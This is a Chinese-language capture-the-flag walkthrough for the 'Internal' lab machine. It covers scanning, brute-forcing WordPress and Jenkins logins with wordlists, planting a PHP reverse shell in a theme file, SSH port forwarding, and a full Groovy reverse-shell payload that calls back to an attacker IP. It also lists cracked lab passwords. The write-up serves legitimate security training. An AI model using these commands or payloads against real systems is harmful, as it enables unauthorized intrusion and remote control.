靶机ip：10.10.27.141

写在前面

要将internal.thm添加到/etc/hosts 文件中

信息收集

nmap扫描

nmap --min-rate 10000 -sS -sV -sC 10.10.27.141 -oN reports/nmap

发现开放22端口和80端口

80端口

是一个apache的初始页面，扫描一下目录

gobuster dir -u http://internal.thm -w /usr/share/wordlists/dirb/common.txt

访问一下

/blog

/javascript

/phpmyadmin

/wordpress

不难看出，这是一个wordpress的界面，wordpress和blog是一个页面，这里以/blog为主，同时还有个phpMyAdmin

获取初始shell

登录wordpress

先看下phpMyAdmin

查看源码发现版本号是4.6.6，通过searchsploit搜索后发现没有什么可以利用的，将注意力转移到wordpress

使用wpscan扫描一下

wpscan --url http://internal.thm/blog/ -e

发现有个admin账户，尝试破解一下密码

wpscan --url http://internal.thm/blog/ -U admin -P /usr/share/wordlists/rockyou.txt

爆破成功，找到了admin账户的密码my2boys

成功登录

shell获取

在这里发现可以随意更改文件内容。这里将404.php内容改成反弹shell的文件是php-reverse-shell，修改ip和port

点击下买你的更新文件。然后在kali上创建监听

现在需要找到404.php文件的位置，从路由中可以看到主题是twentyseventeen，而且大多数主题位于wp-content 目录下，主题位于/wp-content/themes目录下，所以404.php文件的位置是：/wp-content/themes/twentyseventeen/404.php

访问文件http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php

这样我们就拿到了低权用户的shell

先获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

在/home目录下有个aubreanna用户，现在目标就是提升至user权限

提升至user权限

在翻阅目录的过程中发现在 /opt目录下有个wp-save.txt文件，并且这是我们可以查看的文件，查看一下

得到了aubreanna用户的密码bubb13guM!@#123，登录aubreanna用户

成功登录

在/home/aubreanna下找到user.txt

提升至root权限

发现在这个目录还有jenkins.txt文件，查看一下

告诉我们内网Jenkins服务的地址是172.17.0.2:8080

先简单看一下服务

curl http://172.17.0.2:8080

由于目标机器的端口8080只能通过目标机的本地进行访问，所以我们需要设置SSH端口转发，从而将目标机器8080端口上的流量重定向到我们本地攻击机上的地址和端口localhost:8081，在攻击机上的终端界面构造如下命令

ssh -f -N -L 8081:172.17.0.2:8080 aubreanna@internal.thm
#根据前述结果，登录密码为：bubb13guM!@#123
#ssh端口转发(本地网卡地址0.0.0.0可省略)：HostB$ ssh -L 0.0.0.0:PortB:HostC:PortC user@HostC
#参数说明
#-C：压缩数据
#-f ：后台认证用户/密码，通常和-N连用，不用登录到远程主机。
#-N ：不执行脚本或命令，通常与-f连用。
#-g ：在-L/-R/-D参数中，允许远程主机连接到建立转发的端口，如果不加这个参数，只允许本地主机建立连接。
#-L : 本地隧道，本地端口:目标IP:目标端口
#-D : 动态端口转发
#-R : 远程隧道
#-T ：不分配 TTY 只做代理用
#-q ：安静模式，不输出 错误/警告 信息

输入密码后即可访问服务

网上的默认密码无法登录，这里使用hydra暴力破解，先找到登录框的表单内容

找到后就可以构造命令了

1
2
3

hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8081 127.0.0.1 http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password"

#"/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:F=Invalid username or password"

成功爆破出密码spongebob

成功登录！

在管理界面，有一个可以执行命令的地方，在攻击机先建立监听

然后再执行反弹shell的命令

String host="10.11.101.220";
int port=8889;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();